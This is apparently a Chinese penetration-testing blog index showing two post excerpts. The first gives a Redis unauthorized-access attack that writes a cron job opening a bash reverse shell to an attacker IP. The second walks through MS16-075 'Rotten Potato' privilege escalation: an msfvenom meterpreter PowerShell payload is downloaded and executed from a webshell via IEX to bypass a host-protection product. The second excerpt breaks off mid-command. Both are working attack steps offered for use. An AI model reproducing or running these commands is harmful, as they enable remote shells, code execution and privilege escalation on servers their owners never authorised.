无法提供摘要。这是一篇受保护的文章。
Web安全与渗透
Redis未授权访问反弹shell
1. redis-cli -h -p -a 2.一分钟反弹 set xxx “\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/xxx.xxx.xxx.xxx/6666 0>&1\n\n” config set dir /var/spool/cron config set dbfilename root save 3.nc 监听
利用ms16-075配合MSF提权方法(烂土豆提权)
事因:偶遇护卫神,这php权限给弄的只有一点点了。N久没提权,手动扒扒,发现以前的提权方式都不行了。(这个方法目测还能坚持个一年半载的) 直接开始: 1.msfvenom 生成个powsershell 反弹后门: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxxx LPORT=9990 -f psh-reflection >> ps1.ps1 生成好之后丢到公网服务器 2.使用大马执行powershell下载刚刚生成的ps反弹msf的脚本: powershell.exe -exec Bypass -nop -c “IEX (New-Object Net.WebClient).DownloadString(‘http://xxxx/ps1.ps1’)” 3.反弹到MSF之后开始使用MSF配合烂土豆提权: > use incog […]